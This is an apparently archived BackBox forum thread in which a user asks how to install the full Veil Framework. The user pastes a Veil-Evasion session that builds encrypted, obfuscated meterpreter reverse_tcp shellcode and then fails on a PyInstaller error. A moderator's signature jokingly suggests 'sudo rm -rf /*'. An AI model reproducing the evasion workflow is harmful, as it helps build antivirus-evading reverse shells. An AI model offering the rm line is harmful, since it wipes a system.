Pages: [1]   Go Down
Print
Author Topic: installing veil framework  (Read 13762 times)
codehunter
Newbie
*
Posts: 11


View Profile
« on: February 12, 2017, 06:09:32 PM »

how to install complete veil framework not just veil-evasion?
Logged
ZEROF
Hero Member
*****
Posts: 1225


View Profile WWW
« Reply #1 on: February 13, 2017, 04:36:44 AM »

Hi,

This is your 2nd topic on this: https://forum.backbox.org/general-support/(error)-veil-evasion-is-only-supported-on-ubuntu-15-10-or-higher!/

I don't see point of it. And you got answer before.
Logged


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
codehunter
Newbie
*
Posts: 11


View Profile
« Reply #2 on: February 27, 2017, 11:36:24 PM »

can you please help me in getting this problem solved
# veil-Evasion
# list
# use python/shellcodeinject/aesencrypt
python/shellcode_inject/aes_encrypt>>: set USE_PYHERION Y
python/shellcode_inject/aes_encrypt>>:help
python/shellcode_inject/aes_encrypt>>: generate

? Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

> Please enter the number of your choice: 1

* Press enter for windows/meterpreter/reverse_tcp
* Press tab to list available payloads
> Please enter metasploit payload:

> Enter value for 'LHOST', tab for local IP: 192.168.0.6
> Enter value for 'LPORT': 4444
> Enter any extra msfvenom options (syntax: OPTION1=value1 OPTION2=value2):
* Generating shellcode...

> Please enter the base name for output files (default is 'payload'): tutorial

1 - Pyinstaller (default)
2 - Pwnstaller (obfuscated Pyinstaller loader)
3 - Py2Exe

> Please enter the number of your choice:1

[!] ERROR: Can't find python.exe in /home/attacker/.config/wine/veil/drive_c/Python27/
[!] ERROR: Make sure the python.exe binary exists before using PyInstaller.
Logged
codehunter
Newbie
*
Posts: 11


View Profile
« Reply #3 on: February 28, 2017, 12:31:29 AM »

Yes but this was for "veil-evasion" only,I want to install complete "Veil Framework" on backbox where "Veil-Catapult" or "Veil-Ordnance" will install at once..hope you will understand and kind enough to help me!
Logged
ZEROF
Hero Member
*****
Posts: 1225


View Profile WWW
« Reply #4 on: February 28, 2017, 09:10:03 AM »

Hi,

BBox will not support Veil before next version, and i shared that info with url you could see in my first post here. BBox is based on Ubuntu 14.04 LTS and min requirements from Veil docks is Ubuntu 15.10 LTS.

And you can try to fix your error with this: https://null-byte.wonderhowto.com/forum/fix-veil-evasion-error-compiling-python-payloads-and-zero-payload-list-0169604/ (on your own risk)!

And pls, don't open topic after topic on same subject, next time i will remove without warning. Thanks
« Last Edit: February 28, 2017, 09:17:49 AM by ZEROF » Logged


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
codehunter
Newbie
*
Posts: 11


View Profile
« Reply #5 on: February 28, 2017, 10:30:20 AM »

OK understand.Thanks!
Logged
Pages: [1]   Go Up
Print
Jump to: